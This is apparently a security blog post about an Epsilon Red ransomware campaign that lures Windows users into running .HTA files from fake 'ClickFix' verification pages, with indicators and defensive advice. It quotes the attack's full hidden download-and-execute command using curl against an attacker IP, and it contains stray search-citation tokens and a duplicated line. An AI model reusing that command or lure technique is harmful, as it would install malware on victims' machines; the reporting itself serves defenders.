☠️ Hackers Trick Victims into Downloading Weaponized .HTA Files to Install Red Ransomware

Published on: July 26, 2025

By: CyberDudeBivash Editorial Team

Website:cyberdudebivash.com

🚨 What’s Going On: .HTA-Based Ransomware Campaign Hits Windows

Recent reports reveal a global ransomware campaign that tricks users into downloading malicious .HTA (HTML Application) files. These files silently install Epsilon Red ransomware, masquerading as benign “ClickFix” verification pages themed around platforms like Discord, Twitch, Kick, and OnlyFans.(turn0search1, turn0search0)

🔍 Attack Flow: How the Exploit Works

1. Visit a fake “verification” page—victims click a button labeled as “ClickFix” that appears harmless.
2. JavaScript loads an ActiveXObject (WScript.Shell) via the .HTA file.
3. It runs a hidden command:

   cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe

• This silently downloads and executes a.exe (Epsilon Red ransomware) with no visible interface.(turn0search1, turn0search0)
• Finally, a fake verification prompt shows:

  Your Verificatification Code Is: PC‑19fj5e9i‑cje8i3e4
  

Your Verificatification Code Is: PC‑19fj5e9i‑cje8i3e4
intended to distract the victim while the ransomware runs.(turn0search1, turn0search0)

🧩 Why It’s Effective

• Abuses legacy ActiveX in IE/mshta.exe environments—still active in many enterprise systems.
• Bypasses browser-based defenses like SmartScreen and download warnings.
• Minimal user interaction required beyond clicking a button.
• Low forensic footprint at initial stages—no visible binaries or prompts until encryption starts.

🛡️ Recommended Actions to Protect Your Organization

✅ Disable ActiveX and WSH Execution

Block mshta.exe, ActiveXObject usage, and WScript.Shell via Group Policy or AppLocker.

✅ Block Known Threat Infrastructure

Blacklist IPs such as:

• 155.94.155.227:2269
• 213.209.150.188:8112
  and related domains like twtich[.]cc, capchabot[.]cc.(turn0search1, turn0search0)

✅ Harden Email and Web Filtering

• Intercept .HTA downloads.
• Block or sandbox suspicious fake verification pages.

✅ Monitor Suspicious Commands

Use EDR to detect shell.Run, hidden curl downloads, or mshta.exe spawning cmd.exe in user context.

✅ Train Users Against Social Engineering

Educate users not to run files from unknown sites—even pages that mimic trusted services.

🧠 Broader Implications

This campaign shows how outdated technologies like ActiveX still pose high risks. The combination of social engineering, browser exploitation, and zero‑artifact execution makes it a versatile deception tool. Attackers can deploy ransomware like Epsilon Red stealthily, even in hardened environments.

“This new method leverages trusted Windows capabilities to deliver ransomware stealthily—defenders must rethink browser attack protection holistically.”
— CyberDudeBivash Editorial

🔑 Key Takeaways

• .HTA files embedded with JavaScript and ActiveX are launching ransomware silently.
• Epsilon Red leverages this technique to infect systems without visible payloads until encryption occurs.
• Blocking legacy script interfaces, monitoring mshta.exe execution, and educating users are immediate lines of defense.

💬 Join the Conversation

Have you seen suspicious .HTA activity or mshta.exe spawning hidden processes?

Share insights or experiences in the comments or tweet us at @CyberDudeBivash!

🔗 Stay Secure with CyberDudeBivash

For real-time alerts on emerging ransomware tactics, legacy attack vectors, and actionable cybersecurity strategies—subscribe to our Cyber Magazine: cyberdudebivash.com

Tags: #EpsilonRed #HTAattack #Ransomware #ActiveXExploitation #LegacySecurity #MSHTA #CyberThreatIntel #Cybersecurity #CyberDudeBivash